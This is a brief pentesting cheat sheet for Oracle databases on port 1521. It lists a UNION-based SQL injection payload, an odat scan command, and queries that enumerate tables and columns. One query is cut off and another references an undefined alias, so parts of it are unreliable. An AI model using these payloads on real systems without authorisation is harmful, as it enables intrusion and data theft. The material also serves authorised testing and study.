Skip to content

1521 - Pentesting oracle

sql injection

lorem' or 1=1 UNION SELECT NULL,NULL,NULL from dual -- ipsum

odat

odat all -s $IP

tables - Owned by Current user

SELECT table_name, owner FROM user_tables ORDER BY owner, table_nam

tables - accessible by Current User

SELECT table_name, owner FROM all_tables ORDER BY owner, table_name

tables - all

SELECT table_name, owner FROM dba_tables WHERE owner='schema_name' ORDER BY owner, table_name

columns

select column_id, owner, table_name, column_name, data_type, data_length, data_precision, data_scale, nullable from sys.all_tab_columns where col.table_name = 'AP_INVOICES_ALL';